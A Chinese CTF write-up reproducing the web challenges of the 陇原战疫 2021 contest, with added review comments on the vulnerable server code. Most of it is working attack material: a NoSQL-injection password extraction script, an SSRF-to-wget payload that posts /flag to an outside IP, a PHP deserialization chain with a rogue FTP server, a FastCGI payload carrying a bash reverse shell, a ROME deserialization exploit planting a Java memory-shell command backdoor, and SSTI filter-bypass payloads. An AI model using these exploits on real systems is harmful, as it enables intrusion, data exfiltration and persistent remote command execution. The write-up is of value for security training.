陇原战"疫"2021网络安全大赛

陇原战"疫"2021网络安全大赛(复现)

官方wp:https://mp.weixin.qq.com/s/BaNpMsi6PKpe0aeuwiAvwg

CheckIN

审一波代码:

 db_table := conn.DB("ctf").C("users")
    result := User{}
    // NOTE(review): the $where JavaScript predicate is assembled by string
    // concatenation, so username and password become part of the code the
    // database evaluates (NoSQL injection). Matching on fields instead, e.g.
    // bson.M{"username": username, "password": password}, passes the values
    // as data. The stored password also appears to be compared as plaintext;
    // a salted password hash would be expected here.
    err = db_table.Find(bson.M{"$where":"function() {if(this.username == '"+username+"' && this.password == '"+password+"') {return true;}}"}).One(&result)

    // err is assigned but not examined in this excerpt; a failed lookup is
    // detected only through the empty Username of the zero-value result.
    if result.Username == "" {
        c.Header("Content-Type", "text/html; charset=utf-8")
        c.String(200, "<script>alert('Login Failed!');window.location.href='/login'</script>")
        return
    }

经典的注入(后端是MongoDB,$where里拼接了用户输入,严格说是NoSQL注入而不是SQL注入),直接一个二分脚本:

import requests

url = 'http://38d8abd7-d230-4000-976e-d5263de8b29c.node4.buuoj.cn:81/login'

result = ''
i = 0
while (1):
    left = 32
    right = 128
    while (1):
        mid = (left + right) // 2
        if left == right:
            result += chr(left)
            print(result)
            i += 1
            break
        temp = chr(mid)
        if temp == '\\':
            temp = '\\\\'
        payload = {
            "username": f"-1' || this.password[{i}] > '{temp}')return true; else if ('a' == 'b",
            "password": "123"
        }
        res = requests.post(url=url, data=payload).text
        if 'Pretend' in res:
            left = mid + 1
        else:
            right = mid
    if (right == 32):
        break
print('[*]Result ' + result)

然后拿密码直接登录admin。

// getController runs /bin/wget with the elements of the "argv" query array
// after the first one as its arguments, prints any execution error to
// stdout, and always answers 200 "Nothing".
//
// NOTE(review): request-controlled values are handed to wget as arbitrary
// command-line arguments. No shell is involved, but options are accepted
// just like URLs, so this is an argument-injection sink (the write-up relies
// on --post-file). A safer shape takes one validated URL and places it
// after a "--" separator so it cannot be parsed as an option.
func getController(c *gin.Context) {

    // Slicing with [1:] panics when the request carries no "argv" values;
    // the length is not checked first.
    cmd := exec.Command("/bin/wget", c.QueryArray("argv")[1:]...)
    err := cmd.Run()
    if err != nil {
        fmt.Println("error: ", err)
    }

    // The response is the same whether or not wget succeeded.
    c.String(http.StatusOK, "Nothing")
}

/wget明显有参数注入(argv原样作为wget的命令行参数,没有经过shell,严格说不是代码注入),而且


这里有post-file,那么需要一个ssrf来把flag传出来。

// proxyController binds a JSON body into a Url value, rejects it when the
// raw string matches a blacklist regexp, otherwise fetches it with an HTTP
// GET (2 second timeout) and returns the whole response body as JSON.
//
// NOTE(review): this is a server-side request sink guarded only by a
// substring blacklist on the unparsed input. The check does not restrict the
// scheme, does not look at the address the host resolves to, and
// http.Client follows redirects by default, so a permitted URL can still end
// up on an internal address. A robust control parses the URL, allows only
// expected schemes and hosts, and validates the IP actually being dialed
// (e.g. net.IP.IsLoopback / IsPrivate inside a net.Dialer Control hook),
// re-checking on every redirect.
func proxyController(c *gin.Context) {

    var url Url
    if err := c.ShouldBindJSON(&url); err != nil {
        // err is an error value rather than a string here; the other error
        // paths below use err.Error(). It likely serializes as an empty
        // object — confirm.
        c.JSON(500, gin.H{"msg": err})
        return
    }

    // The dots are unescaped, so each "." matches any character, and the
    // pattern is applied to the raw string, not to a parsed and normalized
    // host. It both over-blocks (any URL containing "0x" or "ffff") and
    // under-blocks (other spellings of a loopback address).
    re := regexp.MustCompile("127.0.0.1|0.0.0.0|06433|0x|0177|localhost|ffff")
    if re.MatchString(url.Url) {
        c.JSON(403, gin.H{"msg": "Url Forbidden"})
        return
    }

    client := &http.Client{Timeout: 2 * time.Second}

    resp, err := client.Get(url.Url)
    if err != nil {
        c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
        return
    }
    defer resp.Body.Close()
    // Reads the body in 512-byte chunks until EOF with no upper bound on the
    // total size; only the client timeout limits how much is buffered.
    var buffer [512]byte
    result := bytes.NewBuffer(nil)
    for {
        n, err := resp.Body.Read(buffer[0:])
        result.Write(buffer[0:n])
        if err != nil && err == io.EOF {

            break
        } else if err != nil {
            c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
            return
        }
    }
    // The fetched content is returned to the caller verbatim.
    c.JSON(http.StatusOK, gin.H{"data": result.String()})
}

虽然有黑名单,但它只对原始字符串做子串匹配,直接绕过就能ssrf了。由于传json,可以直接用unicode绕过:应该是因为黑名单检查发生在主机名被规范化之前,检查看到的主机和实际请求的主机并不一致(修复时应在解析之后对最终连接的IP做校验)。

{"url": "http://①27.0.0.1:8080/wget?argv[]=1&argv[]=--post-file&argv[]=/flag&argv[]=http://47.96.173.116:2333"}

eaaasyphp

给了一波源码,一个反序列化。看一波phpinfo,有php-fpm,估计要打。没想到可以反序列化数组,直接卡死了。反序列化payload:

<?php
class Esle{
}
class Bypass{
    public $str4;
    public function __construct($str4){
        $this->str4=$str4;
    }
}
class Welcome{
    public $username;
    public function __construct($username){
        $this->username=$username;
    }
}
class Bunny {
    public $filename;
    public function __construct($filename){
        $this->filename=$filename;
    }
}
$Bunny=new Bunny("ftp://root@47.96.173.116:23/aaaaa");
$Welcome=new Welcome($Bunny);
$Esle=new Esle();
$Bypass=new Bypass($Welcome);
echo urlencode(serialize(array($Esle,$Bypass)));

虽然说有file_put_contents,但是不能写文件,所以直接打phpfpm。用gopherus生成payload:


复制ip地址后面那串%00...然后vps起一个恶意ftp:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

fastcgi默认端口在9000。然后服务器监听,构造payload:

/?code=a%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Esle%22%3A0%3A%7B%7Di%3A1%3BO%3A6%3A%22Bypass%22%3A1%3A%7Bs%3A4%3A%22str4%22%3BO%3A7%3A%22Welcome%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A5%3A%22Bunny%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A31%3A%22ftp%3A%2F%2Froot%4047.96.173.116%3A23%2Faaa%22%3Bs%3A4%3A%22data%22%3BN%3B%7D%7D%7D%7D&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/47.96.173.116/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

即可反弹shell。

EasyJaba

审一波代码。

 @ResponseBody
  @RequestMapping({"/BackDoor"})
  // Decodes the base64 "ctf" request parameter, deserializes it through
  // BlacklistObjectInputStream, prints the object's toString() and always
  // returns a fixed string.
  // NOTE(review): this is native Java deserialization of request data. A
  // class blacklist only blocks the gadget classes its author knew about;
  // an allow-list of expected types (for example java.io.ObjectInputFilter)
  // or a data-only format is the robust control.
  public String BackDoor(@RequestParam(name = "ctf", required = true) String data) throws Exception {
    // Presumably decompiler output: object1 is cast to Set below and passed
    // as the blacklist, so the original was likely an anonymous Set
    // subclass — confirm against the real source.
    Object object1 = new Object(this);
    Object object = null;
    byte[] b = Tool.base64Decode(data);
    InputStream inputStream = new ByteArrayInputStream(b);
    BlacklistObjectInputStream ois = new BlacklistObjectInputStream(inputStream, (Set)object1);
    try {
      object = ois.readObject();
    } catch (IOException e) {
      e.printStackTrace();
    } catch (ClassNotFoundException e) {
      e.printStackTrace();
    } finally {
      // object is still null when readObject() throws, so this line then
      // raises NullPointerException. On success it invokes whatever
      // toString() the deserialized class defines, i.e. code chosen by the
      // sender of the payload.
      System.out.println("information:" + object.toString());
    } 
    return "calm down....";
  }
}

明显一个java反序列化,看一波依赖:

<dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>

rome本来想直接开rua,但是有waf,而且靶机不出网,所以直接抄了一波guoke大佬的exp:https://guokeya.github.io/post/uTJmIcHXf/

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import org.apache.commons.io.FileUtils;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Base64;
public class Exp {
    public static void main(String[] args) throws Exception{
        // 生成恶意 bytecodes
        String code = "{printName();}";
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(test.class.getName());
        clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName()));
        clazz.makeClassInitializer().insertBefore(code);
        byte[][] bytecodes = new byte[][]{clazz.toBytecode()};
        File classFilePath = new File(new File(System.getProperty("user.dir"), ""), "test.class");
        FileUtils.writeByteArrayToFile(classFilePath, clazz.toBytecode());//用来生成内存马文件,从而写入字节码
        // 实例化类并设置属性
        TemplatesImpl templatesimpl = new TemplatesImpl();
        Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes");
        fieldByteCodes.setAccessible(true);
        fieldByteCodes.set(templatesimpl, bytecodes);
        Field fieldName = templatesimpl.getClass().getDeclaredField("_name");
        fieldName.setAccessible(true);
        fieldName.set(templatesimpl, "test");
        Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory");
        fieldTfactory.setAccessible(true);
        fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
        // 要通过2个objectbean才能达成触发条件
        ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl);
        //objectBean1.toString();
        // 输出base64后的序列化数据
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(objectBean1);
        byte[] sss = byteArrayOutputStream.toByteArray();
        out.close();
        String exp = Base64.getEncoder().encodeToString(sss);
        System.out.println(exp);
        //byte[] obj_byte = Base64.getDecoder().decode(exp);
        //InputStream inputStream = new ByteArrayInputStream(obj_byte);
        //ObjectInputStream obj = new ObjectInputStream(inputStream);
        //obj.readObject().toString();
    }
}

上面是触发ROME反序列化的exp。根据ROME 反序列化分析
学习了一波javassist生成动态字节码:Java 反序列化漏洞(8) – 解密 YSoSerial : CommonsCollections2 POP Chains

import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
public class test {
    public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException {
        String className = "com.lyzy.ctf.ezjaba.controller.cmdController";
        byte[] bytes = Base64Utils.decodeFromString("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");
        //控制器的bytecode
        ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        method.invoke(classLoader, className, bytes, 0, bytes.length);
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
        adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
    }
}

上面是test.class的代码,内存马。学习了一波内存马原理:JavaWeb 内存马一周目通关攻略
上面是直接调用的defineClass来加载控制器的class文件,从而加载控制器,写入内存马

package com.lyzy.ctf.ezjaba.controller;
import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class cmdController  extends HandlerInterceptorAdapter {
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        String code = request.getParameter("code");
        if(code != null){
            try {
                java.io.PrintWriter writer = response.getWriter();
                String o = "";
                ProcessBuilder p;
                if(System.getProperty("os.name").toLowerCase().contains("win")){
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", code});
                }else{
                    p = new ProcessBuilder(new String[]{"/bin/sh", "-c", code});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next(): o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            }catch (Exception e){
            }
            return false;
        }
        return true;
    }
}

上面是控制器的源码。
然后请求/?code=cat /flag即可

MagicMail

先在服务器上开一个smtp的服务:

python3 -m smtpd -c DebuggingServer -n 0.0.0.0:2333

然后发送邮件到服务器上


根据接收数据可以发现有ssti注入

过滤了:

根据文章:以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用
可以找到利用姿势。
查找可以利用类:

{{()|attr("\x5f\x5fcl\x61ss\x5f\x5f")|attr("\x5f\x5fb\x61se\x5f\x5f")|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73e\x73\x5f\x5f")()}}

有很多

我们可以记下几个含有eval函数的类:
warnings.catch_warnings
WarningMessage
codecs.IncrementalEncoder
codecs.IncrementalDecoder
codecs.StreamReaderWriter
os._wrap_close
reprlib.Repr
weakref.finalize
......

由于python自带的smtpd模块有base64还带b和回车之类的多余字符,解base64比较麻烦,直接用了guoke大佬的smtp脚本:

import smtpd
import asyncore
import base64
from HTMLParser import HTMLParser
class CustomSMTPServer(smtpd.SMTPServer):

    def process_message(self, peer, mailfrom, rcpttos, data):
        re=data.split("Subject:")[1].split("\n")
        for f in re:
            try:
                print(HTMLParser().unescape(base64.b64decode(f)))
            except:
                pass

server = CustomSMTPServer(('0.0.0.0', 2333), None)

asyncore.loop()

需要python2运行。然后发现可用类:
根据上面提到的几个类,将得到的所有类找索引:

a = '''
<class 'type'
>, <class 'weakref'>, <class 'wea
kcallableproxy'>, <class 'weakproxy'&gt
;, <class 'int'>, <class 'bytearray&
#39;>, <class 'bytes'>, <class 'l
ist'>, <class 'NoneType'>, <class
 'NotImplementedType'>, <class 'traceba
ck'>, <class 'super'>, <class &#3
9;range'>, <class 'dict'>, <class
 'dict_keys'>, <class 'dict_values'
>, <class 'dict_items'>, <class '
dict_reversekeyiterator'>, <class 'dict_rev
ersevalueiterator'>, <class 'dict_reverseit
emiterator'>, <class 'odict_iterator'&g
t;, <class 'set'>, <class 'str'&
gt;, <class 'slice'>, <class 'static
method'>, <class 'complex'>, <cla
ss 'float'>, <class 'frozenset'>
, <class 'property'>, <class 'manage
dbuffer'>, <class 'memoryview'>, &lt
;class 'tuple'>, <class 'enumerate'
>, <class 'reversed'>, <class 'st
derrprinter'>, <class 'code'>, <c
lass 'frame'>, <class 'builtin_function
_or_method'>, <class 'method'>, <
class 'function'>, <class 'mappingproxy
'>, <class 'generator'>, <class &
#39;getset_descriptor'>, <class 'wrapper_de
scriptor'>, <class 'method-wrapper'>
, <class 'ellipsis'>, <class 'member
_descriptor'>, <class 'types.SimpleNamespac
e'>, <class 'PyCapsule'>, <class 
'longrange_iterator'>, <class 'cell&#39
;>, <class 'instancemethod'>, <class 
'classmethod_descriptor'>, <class 'meth
od_descriptor'>, <class 'callable_iterator&
#39;>, <class 'iterator'>, <class &#3
9;pickle.PickleBuffer'>, <class 'coroutine&
#39;>, <class 'coroutine_wrapper'>, <
class 'InterpreterID'>, <class 'Encodin
gMap'>, <class 'fieldnameiterator'>,
 <class 'formatteriterator'>, <class &#3
9;BaseException'>, <class 'hamt'>, &
lt;class 'hamt_array_node'>, <class 'ha
mt_bitmap_node'>, <class 'hamt_collision_no
de'>, <class 'keys'>, <class &#39
;values'>, <class 'items'>, <clas
s 'Context'>, <class 'ContextVar'&g
t;, <class 'Token'>, <class 'Token.M
ISSING'>, <class 'moduledef'>, <c
lass 'module'>, <class 'filter'>
, <class 'map'>, <class 'zip'&gt
;, <class '_frozen_importlib._ModuleLock'>,
 <class '_frozen_importlib._DummyModuleLock'&g
t;, <class '_frozen_importlib._ModuleLockManager&#
39;>, <class '_frozen_importlib.ModuleSpec'
>, <class '_frozen_importlib.BuiltinImporter&#3
9;>, <class 'classmethod'>, <class &#
39;_frozen_importlib.FrozenImporter'>, <class &
#39;_frozen_importlib._ImportLockContext'>, <cl
ass '_thread._localdummy'>, <class '_th
read._local'>, <class '_thread.lock'&gt
;, <class '_thread.RLock'>, <class '
_frozen_importlib_external.WindowsRegistryFinder'>
, <class '_frozen_importlib_external._LoaderBasics
'>, <class '_frozen_importlib_external.File
Loader'>, <class '_frozen_importlib_externa
l._NamespacePath'>, <class '_frozen_importl
ib_external._NamespaceLoader'>, <class '_fr
ozen_importlib_external.PathFinder'>, <class &#
39;_frozen_importlib_external.FileFinder'>, <cl
ass '_io._IOBase'>, <class '_io._BytesI
OBuffer'>, <class '_io.IncrementalNewlineDe
coder'>, <class 'posix.ScandirIterator'
>, <class 'posix.DirEntry'>, <class &
#39;zipimport.zipimporter'>, <class 'zipimp
ort._ZipImportResourceReader'>, <class 'cod
ecs.Codec'>, <class 'codecs.IncrementalEnco
der'>, <class 'codecs.IncrementalDecoder&#3
9;>, <class 'codecs.StreamReaderWriter'>
, <class 'codecs.StreamRecoder'>, <class
 '_abc_data'>, <class 'abc.ABC'>
, <class 'dict_itemiterator'>, <class &#
39;collections.abc.Hashable'>, <class 'coll
ections.abc.Awaitable'>, <class 'collection
s.abc.AsyncIterable'>, <class 'async_genera
tor'>, <class 'collections.abc.Iterable&#39
;>, <class 'bytes_iterator'>, <class 
'bytearray_iterator'>, <class 'dict_key
iterator'>, <class 'dict_valueiterator'
>, <class 'list_iterator'>, <class &#
39;list_reverseiterator'>, <class 'range_it
erator'>, <class 'set_iterator'>, &l
t;class 'str_iterator'>, <class 'tuple_
iterator'>, <class 'collections.abc.Sized&#
39;>, <class 'collections.abc.Container'&gt
;, <class 'collections.abc.Callable'>, <
class 'os._wrap_close'>, <class '_siteb
uiltins.Quitter'>, <class '_sitebuiltins._P
rinter'>, <class '_sitebuiltins._Helper&#39
;>, <class 'types.DynamicClassAttribute'&gt
;, <class 'types._GeneratorWrapper'>, <c
lass 'enum.auto'>, <enum 'Enum'>
, <class 're.Pattern'>, <class 're.M
atch'>, <class '_sre.SRE_Scanner'>, 
<class 'sre_parse.State'>, <class 's
re_parse.SubPattern'>, <class 'sre_parse.To
kenizer'>, <class 'operator.itemgetter'
>, <class 'operator.attrgetter'>, <cl
ass 'operator.methodcaller'>, <class 'i
tertools.accumulate'>, <class 'itertools.co
mbinations'>, <class 'itertools.combination
s_with_replacement'>, <class 'itertools.cyc
le'>, <class 'itertools.dropwhile'>,
 <class 'itertools.takewhile'>, <class &
#39;itertools.islice'>, <class 'itertools.s
tarmap'>, <class 'itertools.chain'>,
 <class 'itertools.compress'>, <class &#
39;itertools.filterfalse'>, <class 'itertoo
ls.count'>, <class 'itertools.zip_longest&#
39;>, <class 'itertools.permutations'>, 
<class 'itertools.product'>, <class &#39
;itertools.repeat'>, <class 'itertools.grou
pby'>, <class 'itertools._grouper'>,
 <class 'itertools._tee'>, <class 'i
tertools._tee_dataobject'>, <class 'reprlib
.Repr'>, <class 'collections.deque'>
, <class '_collections._deque_iterator'>, &
lt;class '_collections._deque_reverse_iterator'&g
t;, <class '_collections._tuplegetter'>, &l
t;class 'collections._Link'>, <class 'f
unctools.partial'>, <class 'functools._lru_
cache_wrapper'>, <class 'functools.partialm
ethod'>, <class 'functools.singledispatchme
thod'>, <class 'functools.cached_property&#
39;>, <class 're.Scanner'>, <class &#
39;warnings.WarningMessage'>, <class 'warni
ngs.catch_warnings'>, <class 'importlib.abc
.Finder'>, <class 'importlib.abc.Loader&#39
;>, <class 'importlib.abc.ResourceReader'&g
t;, <class 'contextlib.ContextDecorator'>, 
<class 'contextlib._GeneratorContextManagerBase&#3
9;>, <class 'contextlib._BaseExitStack'>
, <class 'tokenize.Untokenizer'>, <class
 'traceback.FrameSummary'>, <class 'tra
ceback.TracebackException'>, <class '_ast.A
ST'>, <class 'ast.NodeVisitor'>, &lt
;class '_sha512.sha384'>, <class '_sha5
12.sha512'>, <class '_random.Random'&gt
;, <class 'select.poll'>, <class 'se
lect.epoll'>, <class 'selectors.BaseSelecto
r'>, <class '_socket.socket'>, <c
lass 'datetime.date'>, <class 'datetime
.timedelta'>, <class 'datetime.time'&gt
;, <class 'datetime.tzinfo'>, <class &#3
9;urllib.parse._ResultMixinStr'>, <class 'u
rllib.parse._ResultMixinBytes'>, <class 'ur
llib.parse._NetlocResultMixinBase'>, <class &#3
9;calendar._localized_month'>, <class 'cale
ndar._localized_day'>, <class 'calendar.Cal
endar'>, <class 'calendar.different_locale&
#39;>, <class 'email._parseaddr.AddrlistClass&#
39;>, <class 'Struct'>, <class 'u
npack_iterator'>, <class 'string.Template&#
39;>, <class 'string.Formatter'>, <cl
ass 'email.charset.Charset'>, <class 'd
is.Bytecode'>, <class 'inspect.BlockFinder&
#39;>, <class 'inspect._void'>, <clas
s 'inspect._empty'>, <class 'inspect.Pa
rameter'>, <class 'inspect.BoundArguments&#
39;>, <class 'inspect.Signature'>, <c
lass '_weakrefset._IterationGuard'>, <class
 '_weakrefset.WeakSet'>, <class 'weakre
f.finalize._Info'>, <class 'weakref.finaliz
e'>, <class 'threading._RLock'>, &lt
;class 'threading.Condition'>, <class '
threading.Semaphore'>, <class 'threading.Ev
ent'>, <class 'threading.Barrier'>, 
<class 'threading.Thread'>, <class '
logging.LogRecord'>, <class 'logging.Percen
tStyle'>, <class 'logging.Formatter'&gt
;, <class 'logging.BufferingFormatter'>, &l
t;class 'logging.Filter'>, <class 'logg
ing.Filterer'>, <class 'logging.PlaceHolder
'>, <class 'logging.Manager'>, <c
lass 'logging.LoggerAdapter'>, <class '
textwrap.TextWrapper'>, <class '__future__.
_Feature'>, <class 'zlib.Compress'>,
 <class 'zlib.Decompress'>, <class '
_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decom
pressor'>, <class '_lzma.LZMACompressor&#39
;>, <class '_lzma.LZMADecompressor'>, &l
t;class 'zipfile.ZipInfo'>, <class 'zip
file.LZMACompressor'>, <class 'zipfile.LZMA
Decompressor'>, <class 'zipfile._SharedFile
'>, <class 'zipfile._Tellable'>, &lt
;class 'zipfile.ZipFile'>, <class 'zipf
ile.Path'>, <class 'pkgutil.ImpImporter&#39
;>, <class 'pkgutil.ImpLoader'>, <cla
ss 'pyexpat.xmlparser'>, <class 'plistl
ib.Data'>, <class 'plistlib.UID'>, &
lt;class 'plistlib._PlistParser'>, <class &
#39;plistlib._DumbXMLWriter'>, <class 'plis
tlib._BinaryPlistParser'>, <class 'plistlib
._BinaryPlistWriter'>, <class 'email.header
.Header'>, <class 'email.header._ValueForma
tter'>, <class 'email._policybase._PolicyBa
se'>, <class 'email.feedparser.BufferedSubF
ile'>, <class 'email.feedparser.FeedParser&
#39;>, <class 'email.parser.Parser'>, &l
t;class 'email.parser.BytesParser'>, <class
 'tempfile._RandomNameSequence'>, <class &#
39;tempfile._TemporaryFileCloser'>, <class &#39
;tempfile._TemporaryFileWrapper'>, <class '
tempfile.SpooledTemporaryFile'>, <class 'te
mpfile.TemporaryDirectory'>, <class 'pkg_re
sources.extern.VendorImporter'>, <class 'pk
g_resources._vendor.six._LazyDescr'>, <class &#
39;pkg_resources._vendor.six._SixMetaPathImporter'&gt
;, <class 'pkg_resources._vendor.six._LazyDescr&#3
9;>, <class 'pkg_resources._vendor.six._SixMeta
PathImporter'>, <class 'pkg_resources._vend
or.appdirs.AppDirs'>, <class 'pkg_resources
.extern.packaging._structures.Infinity'>, <clas
s 'pkg_resources.extern.packaging._structures.Negativ
eInfinity'>, <class 'pkg_resources.extern.p
ackaging.version._BaseVersion'>, <class 'pk
g_resources.extern.packaging.specifiers.BaseSpecifier&#39
;>, <class 'pprint._safe_key'>, <clas
s 'pprint.PrettyPrinter'>, <class 'pkg_
resources._vendor.pyparsing._Constants'>, <clas
s 'pkg_resources._vendor.pyparsing._ParseResultsWithO
ffset'>, <class 'pkg_resources._vendor.pypa
rsing.ParseResults'>, <class 'pkg_resources
._vendor.pyparsing.ParserElement._UnboundedCache'>
, <class 'pkg_resources._vendor.pyparsing.ParserEl
ement._FifoCache'>, <class 'pkg_resources._
vendor.pyparsing.ParserElement'>, <class 'p
kg_resources._vendor.pyparsing._NullToken'>, <c
lass 'pkg_resources._vendor.pyparsing.OnlyOnce'&g
t;, <class 'pkg_resources._vendor.pyparsing.pypars
ing_common'>, <class 'pkg_resources.extern.
packaging.markers.Node'>, <class 'pkg_resou
rces.extern.packaging.markers.Marker'>, <class 
'pkg_resources.extern.packaging.requirements.Requirem
ent'>, <class 'pkg_resources.IMetadataProvi
der'>, <class 'pkg_resources.WorkingSet&#39
;>, <class 'pkg_resources.Environment'>,
 <class 'pkg_resources.ResourceManager'>, &
lt;class 'pkg_resources.NullProvider'>, <cl
ass 'pkg_resources.NoDists'>, <class 'p
kg_resources.EntryPoint'>, <class 'pkg_reso
urces.Distribution'>, <class 'gunicorn.pidf
ile.Pidfile'>, <class 'gunicorn.sock.BaseSo
cket'>, <class 'gunicorn.arbiter.Arbiter&#3
9;>, <class 'gettext.NullTranslations'>,
 <class 'argparse._AttributeHolder'>, <c
lass 'argparse.HelpFormatter._Section'>, <c
lass 'argparse.HelpFormatter'>, <class &#39
;argparse.FileType'>, <class 'argparse._Act
ionsContainer'>, <class 'shlex.shlex'&g
t;, <class '_ssl._SSLContext'>, <class &
#39;_ssl._SSLSocket'>, <class '_ssl.MemoryB
IO'>, <class '_ssl.Session'>, <cl
ass 'ssl.SSLObject'>, <class 'gunicorn.
reloader.InotifyReloader'>, <class 'gunicor
n.config.Config'>, <class 'gunicorn.config.
Setting'>, <class 'gunicorn.debug.Spew'
>, <class 'gunicorn.app.base.BaseApplication&#3
9;>, <class '_pickle.Unpickler'>, <cl
ass '_pickle.Pickler'>, <class '_pickle
.Pdata'>, <class '_pickle.PicklerMemoProxy&
#39;>, <class '_pickle.UnpicklerMemoProxy'&
gt;, <class 'pickle._Framer'>, <class &#
39;pickle._Unframer'>, <class 'pickle._Pick
ler'>, <class 'pickle._Unpickler'>, 
<class '_queue.SimpleQueue'>, <class &#3
9;queue.Queue'>, <class 'queue._PySimpleQue
ue'>, <class 'logging.handlers.QueueListene
r'>, <class 'socketserver.BaseServer'&g
t;, <class 'socketserver.ForkingMixIn'>, &l
t;class 'socketserver.ThreadingMixIn'>, <cl
ass 'socketserver.BaseRequestHandler'>, <cl
ass 'logging.config.ConvertingMixin'>, <cla
ss 'logging.config.BaseConfigurator'>, <cla
ss 'gunicorn.glogging.Logger'>, <class &#39
;gunicorn.http.body.ChunkedReader'>, <class &#3
9;gunicorn.http.body.LengthReader'>, <class &#3
9;gunicorn.http.body.EOFReader'>, <class 'g
unicorn.http.body.Body'>, <class 'gunicorn.
http.message.Message'>, <class 'gunicorn.ht
tp.unreader.Unreader'>, <class 'gunicorn.ht
tp.parser.Parser'>, <class 'gunicorn.http.w
sgi.FileWrapper'>, <class 'gunicorn.http.ws
gi.Response'>, <class 'subprocess.Completed
Process'>, <class 'subprocess.Popen'&gt
;, <class 'gunicorn.workers.workertmp.WorkerTmp&#3
9;>, <class 'gunicorn.workers.base.Worker'&
gt;, <class 'email.message.Message'>, <c
lass 'email.generator.Generator'>, <class &
#39;_hashlib.HASH'>, <class '_blake2.blake2
b'>, <class '_blake2.blake2s'>, <
class '_sha3.sha3_224'>, <class '_sha3.
sha3_256'>, <class '_sha3.sha3_384'>
, <class '_sha3.sha3_512'>, <class '
_sha3.shake_128'>, <class '_sha3.shake_256&
#39;>, <class 'hmac.HMAC'>, <class &#
39;smtplib.SMTP'>, <class 'email.headerregi
stry.Address'>, <class 'email.headerregistr
y.Group'>, <class 'email.headerregistry.Uns
tructuredHeader'>, <class 'email.headerregi
stry.DateHeader'>, <class 'email.headerregi
stry.AddressHeader'>, <class 'email.headerr
egistry.MIMEVersionHeader'>, <class 'email.
headerregistry.ParameterizedMIMEHeader'>, <clas
s 'email.headerregistry.ContentTransferEncodingHeader
'>, <class 'email.headerregistry.MessageIDH
eader'>, <class 'email.headerregistry.Heade
rRegistry'>, <class 'email.contentmanager.C
ontentManager'>, <class 'typing._Final'
